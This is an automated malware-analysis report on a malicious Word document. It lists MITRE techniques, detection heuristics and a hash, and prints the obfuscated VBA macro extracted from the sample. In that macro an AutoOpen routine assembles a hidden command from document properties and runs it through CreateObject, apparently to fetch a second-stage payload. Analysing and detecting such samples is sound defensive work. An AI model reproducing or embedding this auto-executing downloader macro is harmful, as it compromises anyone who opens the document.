MALICIOUS (Risk Score: 192)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. Heuristics indicate the presence of an auto-executing macro ('autoopen') that uses 'CreateObject' to likely download and execute a second-stage payload, as suggested by the ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0'. The VBA macro itself is heavily obfuscated, but its structure and the heuristic firings strongly suggest a downloader functionality.
Heuristics (8)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `hCmKFBfWmE = "yCwPaXvdBkA" CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0 MEembHVxzx = "rupHwEnskFY"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen() SEWfmEPmHBD`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10086 bytes |

SHA-256: 958723df6a095070f80dc4d850123fa3f28636883d8934287e3d6ce8c8eb2780

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 235 of 275 identifiers look randomly generated (e.g. 'UMKDLgDUKvd'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function UuWGcCKmm()
Dim kSdCGKtvftA()
TPZkbBcCd = 7693
ReDim kSdCGKtvftA(7693)
kSdCGKtvftA(4023) = YMgAfUPC
kSdCGKtvftA(6846) = tskVCYKZ
kSdCGKtvftA(4329) = 432
kSdCGKtvftA(3548) = 5597
kSdCGKtvftA(4625) = 5448
kSdCGKtvftA(2176) = 4280
For TPZkbBcCd = 3514 To 3656
kSdCGKtvftA(TPZkbBcCd) = TPZkbBcCd
Next
End Function
Function nnfGeycE()
Dim wHvWLyCCL()
DnExBHxRyfp = 8655
ReDim wHvWLyCCL(8655)
wHvWLyCCL(3795) = PzCMcVcgnh
wHvWLyCCL(7209) = xztUgbFWDCL
wHvWLyCCL(6882) = TRNmmsArVhW
wHvWLyCCL(2806) = pbBHkrSdTMe
wHvWLyCCL(2583) = 7295
wHvWLyCCL(1945) = 5468
wHvWLyCCL(738) = 9279
wHvWLyCCL(4941) = 7633
wHvWLyCCL(1137) = 3166
wHvWLyCCL(1210) = 5447
For DnExBHxRyfp = 5741 To 261
wHvWLyCCL(DnExBHxRyfp) = DnExBHxRyfp
Next
End Function
Function RZYYtdsM()
Dim LeHYbnYspZ()
sgNrVGUwG = 7163
ReDim LeHYbnYspZ(7163)
LeHYbnYspZ(6409) = SVvmkMBg
LeHYbnYspZ(2948) = RdmThCHmTL
LeHYbnYspZ(2082) = LdWNekGrLw
LeHYbnYspZ(6783) = LsMsgBGyRb
LeHYbnYspZ(7054) = WTFzMExVy
LeHYbnYspZ(6152) = gsafKsLKTYr
LeHYbnYspZ(5268) = 3291
LeHYbnYspZ(346) = 278
LeHYbnYspZ(487) = 6849
For sgNrVGUwG = 6927 To 5687
LeHYbnYspZ(sgNrVGUwG) = sgNrVGUwG
Next
End Function
Function hZsSvuuLN()
Dim WbvUBcPhR()
DfVfApYTMpS = 5773
ReDim WbvUBcPhR(5773)
WbvUBcPhR(4737) = aeCevfdRve
WbvUBcPhR(5411) = wsyYvTeT
WbvUBcPhR(5427) = wpXgmMULn
WbvUBcPhR(3091) = 384
WbvUBcPhR(1600) = 9103
WbvUBcPhR(2853) = 9593
For DfVfApYTMpS = 3128 To 410
WbvUBcPhR(DfVfApYTMpS) = DfVfApYTMpS
Next
End Function
Function HeeUEhda()
Dim SkCRBzTNKkZ()
rGPpRNaR = 6882
ReDim SkCRBzTNKkZ(6882)
SkCRBzTNKkZ(1649) = fvtEMUAruuY
SkCRBzTNKkZ(1977) = gSSheHkUPD
SkCRBzTNKkZ(3057) = RHmhhTzWPKr
SkCRBzTNKkZ(1459) = 8296
SkCRBzTNKkZ(2652) = 1995
For rGPpRNaR = 3667 To 1519
SkCRBzTNKkZ(rGPpRNaR) = rGPpRNaR
Next
End Function
Function bsEWmzMcdBe()
Dim CvXcKFfE()
xZARnFmnKK = 9349
ReDim CvXcKFfE(9349)
CvXcKFfE(1894) = tzheUEHKB
CvXcKFfE(9226) = eEFPAmvs
CvXcKFfE(7353) = fyTuKpgs
CvXcKFfE(1583) = APhvZMFa
CvXcKFfE(3344) = hSxwwPdFEMr
CvXcKFfE(4620) = 4269
CvXcKFfE(6711) = 8144
CvXcKFfE(6355) = 4741
CvXcKFfE(6902) = 5694
CvXcKFfE(5980) = 167
CvXcKFfE(5369) = 6975
For xZARnFmnKK = 9298 To 1013
CvXcKFfE(xZARnFmnKK) = xZARnFmnKK
Next
End Function
Function zNpvdYtuxWc()
Dim pNDdndaTme()
uKtRmAEVPeB = 665
ReDim pNDdndaTme(665)
pNDdndaTme(109) = KtxVVDXX
pNDdndaTme(222) = LrLKszrX
pNDdndaTme(582) = PzGLGcxAa
pNDdndaTme(458) = PWenwNyU
pNDdndaTme(280) = 5113
pNDdndaTme(193) = 8710
pNDdndaTme(630) = 7182
pNDdndaTme(605) = 6362
pNDdndaTme(587) = 4716
pNDdndaTme(227) = 7107
For uKtRmAEVPeB = 561 To 174
pNDdndaTme(uKtRmAEVPeB) = uKtRmAEVPeB
Next
End Function
Function vcvVFmHrhmB()
Dim nVbNtczP()
mhDyWwhahX = 6402
ReDim nVbNtczP(6402)
nVbNtczP(4696) = CkzygCgDzZb
nVbNtczP(1875) = zWKnYBByaWs
nVbNtczP(1550) = kLTBAXEWszx
nVbNtczP(5133) = 7583
nVbNtczP(5891) = 8940
nVbNtczP(4413) = 2627
nVbNtczP(6249) = 3938
nVbNtczP(2793) = 9756
For mhDyWwhahX = 2505 To 5149
nVbNtczP(mhDyWwhahX) = mhDyWwhahX
Next
End Function
Function eGWaDsAyChp()
Dim hzZYGBpHP()
NMWcebCs = 4857
ReDim hzZYGBpHP(4857)
hzZYGBpHP(2256) = VsXBYryVaSF
hzZYGBpHP(2623) = fzLswewUWF
hzZYGBpHP(3235) = AtWvtbUkWxf
hzZYGBpHP(1792) = yvVETnsctaW
hzZYGBpHP(1580) = nMwxXYRxB
hzZYGBpHP(2536) = 3693
hzZYGBpHP(102) = 5824
hzZYGBpHP(2209) = 4767
hzZYGBpHP(3984) = 1537
hzZYGBpHP(2028) = 2006
hzZYGBpHP(3499) = 5860
For NMWcebCs = 4007 To 2149
hzZYGBpHP(NMWcebCs) = NMWcebCs
Next
End Function
Sub autoopen()
SEWfmEPmHBD
End Sub
Public Function GGeYpdzkeM(fBdFXvMtWT)
hTZSUBMTAp = "sGsbdLrufp"
etpVGVum = "mETgKbgsHUe"
RbuVtvzvn = "bHHAUnMrXF"
sGLckvMGP = "rBVUkYByC"
wtfFFppf = "uFveWEEEaY"
epuRGHUUy = "XrtpPEBA"
BEptVXeVF = "WmWccFVD"
RFWVXGGk = "WuAcsYwfLk"
GGeYpdzkeM = ActiveDocument.CustomDocumentProperties(fBdFXvMtWT) + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + fAFfTtLxGWk
pGbUGMfsW = "GsGLRHSZF"
aFghZswaEER = "GmCnPwLCyeX"
pTbhZFbtdk = "FYCKbrgUkR"
wrTCDkNVL = "ksPMFZzVSv"
ddsGyCeGCy = "gmTYWTbcK"
VrcpSuxkS = "RzGpHkrdTvW"
EVvySgLv = "YMzaDpeArN"
WNzYVGXkpb = "MTrKbHsu"
End Function
Public Function yWfzXCLRL()
mKVetctGMYn = "yrKYdwEpzf"
wsPdXayTZRw = "TDDgmTTyRx"
bDPkHxMmhZ = "uMcTbpnk"
NYDBXAXVeyM = "TESuhLABY"
mPhwykaRdnT = GGeYpdzkeM("pVesNMDD") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + GGeYpdzkeM("dNWBxeLpvh") + GGeYpdzkeM("CpGEXgyr") + GGeYpdzkeM("aLVULngBk")
sFnZRZPcH = "PDbZUMVXHt"
EASVYTff = "LwZMCcPwzKr"
pGNgeMpZKDC = "pfVfhKYYar"
wVutHFFGf = "MGeCRRmVY"
vUHWEKHTFgR = "dYXSfeKPyhP"
bBWBsxvZC = GGeYpdzkeM("wFvScDNrcD") + GGeYpdzkeM("NYYUbSvw") + GGeYpdzkeM("HmgKxtsXwWn") + GGeYpdzkeM("rxNWFLuZNW") + GGeYpdzkeM("fLgpEEPySWS")
zCxWFrktb = bBWBsxvZC + mPhwykaRdnT
SUYXaKFEUuW = "MSTnMrBu"
kKZgRMfZfU = "hWYzZzxYG"
EAfvZZTzZZc = "RfevhmkpG"
kDXxBakP = "FMAfwvcMZ"
bypkzXrdVG = "kyKpzZuu"
cxKFcMZBw = "bkzKKuWegtf"
swBKwKeaG = "bDkeumaG"
yWfzXCLRL = zCxWFrktb + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function DGVuXEDvC()
DGVuXEDvC = GGeYpdzkeM("yNNaEaEaNwC") + GGeYpdzkeM("WkZhErcT") + GGeYpdzkeM("eXnFgAWpc") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + LFCMtdME
ybtCwxsYME = "dwvYYCNkwH"
VPtAHYYE = "eDukLMCZ"
HLnDkgEB = "LKWRytBKLr"
gHubZGfS = "SRaEWtypnc"
KETmkAzVKG = "NhSeLKsVgb"
rWxTmwpdyxY = "UMKDLgDUKvd"
GtnsxVnwwWz = "myrkrBZyf"
nxewRZDYvc = "LNzEbhvez"
End Function
Public Function SEWfmEPmHBD()
GfutSEbC = "WLAgFBWXS"
hCmKFBfWmE = "yCwPaXvdBkA"
CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0
MEembHVxzx = "rupHwEnskFY"
KpeGBCCgUK = "nMRgtsuC"
XgyNuUwXDHc = "DEmanafDgp"
wmGykMxYtaX = "GfbhYMeU"
kDVzduac = "GrByEmpbpck"
nbYSaWpPm = "XAPTCMSeYA"
bnfHpKELGK = "RxnUsradM"
GpZFzNEbX = "NDVYKYmLzgM"
End Function
Function EkWGTpmUsXR()
Dim XgvwtwGkp()
GhfLaHkTgus = 3246
ReDim XgvwtwGkp(3246)
XgvwtwGkp(2395) = UNEspXYY
XgvwtwGkp(654) = UpCTgvecf
XgvwtwGkp(2967) = WRmrtbDs
XgvwtwGkp(1343) = nSruxddRGPx
XgvwtwGkp(273) = vCLPuXNp
XgvwtwGkp(1449) = 7419
XgvwtwGkp(3080) = 2346
XgvwtwGkp(1852) = 8347
XgvwtwGkp(2841) = 3943
XgvwtwGkp(1911) = 7688
XgvwtwGkp(3036) = 1371
For GhfLaHkTgus = 2645 To 214
XgvwtwGkp(GhfLaHkTgus) = GhfLaHkTgus
Next
End Function
Function hdXSENYcU()
Dim zKwScAKM()
LTGugrSXf = 8982
ReDim zKwScAKM(8982)
zKwScAKM(4706) = FAnLpFWpCLC
zKwScAKM(4294) = wPwvHEEZpV
zKwScAKM(8189) = ZWwRgvAExG
zKwScAKM(1571) = GAtpWWVc
zKwScAKM(8382) = 8495
zKwScAKM(6757) = 7115
For LTGugrSXf = 3055 To 8866
zKwScAKM(LTGugrSXf) = LTGugrSXf
Next
End Function
Function ZztYaWcC()
Dim WUVbNddg()
BtFmVMSZwLm = 9622
ReDim WUVbNddg(9622)
WUVbNddg(7816) = eKxWATFh
WUVbNddg(6799) = ZKHVsvvP
WUVbNddg(270) = 6448
WUVbNddg(7474) = 1367
For BtFmVMSZwLm = 4073 To 6257
WUVbNddg(BtFmVMSZwLm) = BtFmVMSZwLm
Next
End Function
Function XrcPySkKE()
Dim CPhcUGXuTZx()
vNVdMHTYbY = 7775
ReDim CPhcUGXuTZx(7775)
CPhcUGXuTZx(1299) = HKzBzRLn
CPhcUGXuTZx(3827) = bpgvSXXW
CPhcUGXuTZx(671) = cWBPpkcDSyt
CPhcUGXuTZx(3438) = hfvVwdNuHN
CPhcUGXuTZx(7210) = hemPwEdRd
CPhcUGXuTZx(1480) = 4486
CPhcUGXuTZx(3056) = 9935
CPhcUGXuTZx(4716) = 2964
CPhcUGXuTZx(2311) = 6556
CPhcUGXuTZx(4191) = 6614
CPhcUGXuTZx(1281) = 5481
For vNVdMHTYbY = 586 To 7250
CPhcUGXuTZx(vNVdMHTYbY) = vNVdMHTYbY
Next
End Function
Function FAfkgkZX()
Dim GLvUdNmBx()
tvagCGmBbhW = 2152
ReDim GLvUdNmBx(2152)
GLvUdNmBx(1217) = nHKzetXvs
GLvUdNmBx(1669) = gASccAAAkbX
GLvUdNmBx(2083) = CCdnLLVDt
GLvUdNmBx(511) = ncpkGKnk
GLvUdNmBx(1751) = PGWVuLAMC
GLvUdNmBx(1432) = BfSzSfSSns
GLvUdNmBx(2141) = 8278
GLvUdNmBx(528) = 7989
GLvUdNmBx(2083) = 3819
GLvUdNmBx(75) = 2190
GLvUdNmBx(910) = 1218
For tvagCGmBbhW = 1608 To 230
GLvUdNmBx(tvagCGmBbhW) = tvagCGmBbhW
Next
End Function
Function nbXrebyaC()
Dim sAebgYCbs()
XVFzPNRuCa = 2298
ReDim sAebgYCbs(2298)
sAebgYCbs(2159) = FUtamvXSFW
sAebgYCbs(1080) = LakeNvfEw
sAebgYCbs(255) = MXxUTAkSSF
sAebgYCbs(1978) = yMStUdAX
sAebgYCbs(193) = rmKrzgMszu
sAebgYCbs(1477) = 7362
sAebgYCbs(1983) = 985
sAebgYCbs(1896) = 2666
sAebgYCbs(873) = 3357
sAebgYCbs(1198) = 2412
For XVFzPNRuCa = 584 To 2101
sAebgYCbs(XVFzPNRuCa) = XVFzPNRuCa
Next
End Function
Function sKekEVXvLv()
Dim adrcTyWDU()
bfnDemYRp = 8138
ReDim adrcTyWDU(8138)
adrcTyWDU(2610) = mLapvgwVs
adrcTyWDU(4920) = fuPVrdUybX
adrcTyWDU(574) = WyzRKZTy
adrcTyWDU(6078) = wLwAaNCarF
adrcTyWDU(3191) = 6052
adrcTyWDU(992) = 192
adrcTyWDU(3840) = 9929
adrcTyWDU(5318) = 7084
adrcTyWDU(2567) = 9669
For bfnDemYRp = 6497 To 6377
adrcTyWDU(bfnDemYRp) = bfnDemYRp
Next
End Function
Function TDgzytVCRA()
Dim HVUAKyLg()
rhfZYSgHd = 3128
ReDim HVUAKyLg(3128)
HVUAKyLg(605) = HvnehNHWMAu
HVUAKyLg(2491) = fCeBpDURfba
HVUAKyLg(558) = 2588
HVUAKyLg(1699) = 1794
HVUAKyLg(692) = 9464
For rhfZYSgHd = 2836 To 1514
HVUAKyLg(rhfZYSgHd) = rhfZYSgHd
Next
End Function
Function nbsVuhDwLPy()
Dim HEWPwSKcEDh()
wBdwXuvMC = 8919
ReDim HEWPwSKcEDh(8919)
HEWPwSKcEDh(6895) = XVdgbXgEp
HEWPwSKcEDh(918) = HBXNZWbprd
HEWPwSKcEDh(4160) = vMxnynby
HEWPwSKcEDh(2434) = fNEaCnLrvw
HEWPwSKcEDh(5411) = 7538
HEWPwSKcEDh(512) = 8408
HEWPwSKcEDh(2106) = 2488
HEWPwSKcEDh(692) = 1794
HEWPwSKcEDh(7110) = 4916
HEWPwSKcEDh(573) = 4534
For wBdwXuvMC = 383 To 899
HEWPwSKcEDh(wBdwXuvMC) = wBdwXuvMC
Next
End Function